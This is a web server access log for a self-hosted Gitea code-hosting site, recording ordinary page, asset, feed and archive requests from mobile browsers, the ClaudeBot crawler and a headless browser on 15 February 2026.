- 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 103.4.250.69] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 103.4.250.69] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 103.4.250.69] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 104.253.252.195] [Length 5667] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 104.253.252.195] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 104.253.252.195] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 104.253.252.195] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 104.253.252.195] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 104.253.252.195] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 104.253.252.195] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 104.253.252.195] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 104.253.252.195] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:05:36:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer" [Client 216.73.216.188] [Length 8147] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users" [Client 216.73.216.188] [Length 5447] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations" [Client 216.73.216.188] [Length 5057] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Python" [Client 216.73.216.188] [Length 6301] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/forks" [Client 216.73.216.188] [Length 7289] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=HTML" [Client 216.73.216.188] [Length 6288] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 216.73.216.188] [Length 17087] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/forks" [Client 216.73.216.188] [Length 7291] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/stars" [Client 216.73.216.188] [Length 7383] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/stars" [Client 216.73.216.188] [Length 7380] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Roff" [Client 216.73.216.188] [Length 6296] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=C%23" [Client 216.73.216.188] [Length 6303] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/forks" [Client 216.73.216.188] [Length 7286] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/stars" [Client 216.73.216.188] [Length 7377] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fexplore%2Frepos" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 216.73.216.188] [Length 14548] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 216.73.216.188] [Length 14725] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fuser%2Fsign_up" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/forgot_password" [Client 216.73.216.188] [Length 4108] [Gzip 2.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/swagger.js" [Client 216.73.216.188] [Length 419897] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:05:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/swagger.css" [Client 216.73.216.188] [Length 23395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:12:00 +0000] - 200 200 - HEAD https git.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" -[15/Feb/2026:06:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 5665] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.7499.4 Safari/537.36" "-" -[15/Feb/2026:06:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 146.70.185.32] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.7499.4 Safari/537.36" "-" -[15/Feb/2026:06:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 146.70.185.32] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.7499.4 Safari/537.36" "-" -[15/Feb/2026:06:44:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.rss" [Client 216.73.216.188] [Length 2411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.atom" [Client 216.73.216.188] [Length 2476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls" [Client 216.73.216.188] [Length 9929] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src" [Client 216.73.216.188] [Length 48] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 216.73.216.188] [Length 14725] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src" -[15/Feb/2026:06:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects" [Client 216.73.216.188] [Length 6769] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src" [Client 216.73.216.188] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 216.73.216.188] [Length 14547] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src" -[15/Feb/2026:06:44:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main" -[15/Feb/2026:06:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.rss" [Client 216.73.216.188] [Length 21994] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.atom" [Client 216.73.216.188] [Length 23321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main" -[15/Feb/2026:06:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues" [Client 216.73.216.188] [Length 10104] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity" [Client 216.73.216.188] [Length 8596] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity" [Client 216.73.216.188] [Length 8577] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues" [Client 216.73.216.188] [Length 10096] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/packages" [Client 216.73.216.188] [Length 6401] [Gzip 2.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects" [Client 216.73.216.188] [Length 7771] [Gzip 2.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.rss" [Client 216.73.216.188] [Length 7854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.atom" [Client 216.73.216.188] [Length 8270] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects" [Client 216.73.216.188] [Length 7765] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls" [Client 216.73.216.188] [Length 9935] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/wiki" [Client 216.73.216.188] [Length 7377] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src" [Client 216.73.216.188] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags" [Client 216.73.216.188] [Length 7736] [Gzip 2.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 216.73.216.188] [Length 17088] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/src" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/branches" [Client 216.73.216.188] [Length 10323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/wiki" [Client 216.73.216.188] [Length 7373] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/actions" [Client 216.73.216.188] [Length 7418] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/actions" [Client 216.73.216.188] [Length 7414] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/packages" [Client 216.73.216.188] [Length 7412] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/packages" [Client 216.73.216.188] [Length 7408] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects" [Client 216.73.216.188] [Length 7765] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/main.zip" [Client 216.73.216.188] [Length 61374] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.rss" [Client 216.73.216.188] [Length 5404] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.atom" [Client 216.73.216.188] [Length 5698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=activity" [Client 216.73.216.188] [Length 10303] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest" [Client 216.73.216.188] [Length 10706] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/main.bundle" [Client 216.73.216.188] [Length 37269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 